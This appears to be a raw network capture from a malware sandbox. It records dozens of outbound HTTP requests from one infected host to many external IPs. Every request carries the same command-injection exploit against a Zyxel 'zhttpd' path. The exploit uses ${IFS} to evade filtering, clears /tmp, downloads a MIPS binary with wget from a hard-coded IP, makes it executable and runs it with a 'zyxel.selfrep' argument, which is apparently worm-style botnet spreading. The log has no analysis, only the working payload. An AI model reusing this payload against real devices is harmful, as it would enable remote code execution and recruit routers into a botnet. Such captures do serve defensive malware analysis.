                                      Jan 14, 2024 15:50:40.142476082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2710192.168.2.1435710211.183.252.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142508030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2711192.168.2.143745252.142.105.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142579079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2712192.168.2.145976031.114.133.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142597914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2713192.168.2.144623268.244.10.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142647982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2714192.168.2.14335568.230.162.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142678976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2715192.168.2.1448716184.170.66.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142734051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2716192.168.2.1454212169.133.39.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142767906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2717192.168.2.14457928.14.103.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142806053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2718192.168.2.144602237.191.2.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142843008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2719192.168.2.144474449.82.154.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142890930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2720192.168.2.145896275.209.131.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142923117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2721192.168.2.143967082.181.76.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142973900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2722192.168.2.1433590154.0.90.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143017054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2723192.168.2.1452274180.91.150.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143054008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2724192.168.2.1435958222.25.38.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143112898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2725192.168.2.144953412.165.35.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143163919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2726192.168.2.1451476170.108.123.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143196106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2727192.168.2.1450482178.72.30.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143232107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2728192.168.2.1435788178.49.245.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143275023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2729192.168.2.1442656133.255.247.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143337011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2730192.168.2.145540481.90.45.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143373966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2731192.168.2.1453400202.188.71.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143413067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2732192.168.2.145710894.160.37.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143466949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2733192.168.2.144931271.75.162.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143507957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2734192.168.2.1433594119.162.149.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143549919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2735192.168.2.1444986166.235.208.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143568993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2736192.168.2.1438462177.20.13.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143641949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2737192.168.2.144708892.241.48.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143668890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2738192.168.2.1442052210.109.112.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143701077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2739192.168.2.1448138124.239.248.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143758059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2740192.168.2.1451648147.209.118.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143794060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2741192.168.2.1459862156.145.244.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143831968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2742192.168.2.1451660123.79.130.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143877983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2743192.168.2.1448872126.107.43.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143904924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2744192.168.2.1455986217.255.47.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143944025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2745192.168.2.1447702179.158.95.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.143980980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2746192.168.2.144377253.216.47.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144013882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2747192.168.2.145308271.86.180.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144049883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2748192.168.2.143370831.151.181.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144105911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2749192.168.2.145381489.250.200.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144140005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2750192.168.2.1432794212.115.31.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144176006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2751192.168.2.143663453.115.182.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144202948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2752192.168.2.1438566110.124.95.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144253969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2753192.168.2.1448252153.155.67.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144280910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2754192.168.2.1435632133.152.88.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144337893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2755192.168.2.1460224109.200.95.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144387960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2756192.168.2.144638644.143.217.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144442081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2757192.168.2.1455744193.92.160.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144473076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2758192.168.2.1450348151.79.23.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144495964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2759192.168.2.1460000217.83.121.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144517899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2760192.168.2.145177674.33.88.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144586086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2761192.168.2.144169477.110.171.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144618988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2762192.168.2.145672643.61.36.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144654036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2763192.168.2.1451864205.48.158.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144710064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2764192.168.2.1437252119.245.127.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144754887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2765192.168.2.1447404188.78.167.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144790888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2766192.168.2.143512431.173.80.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144834042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2767192.168.2.143880899.215.76.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144865036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2768192.168.2.1435320200.230.146.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144901037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2769192.168.2.144779638.180.146.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144941092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2770192.168.2.145135214.134.164.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.144967079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2771192.168.2.145621235.111.249.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145020008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2772192.168.2.1434492105.51.191.252443
                                      TimestampBytes transferredDirectionData
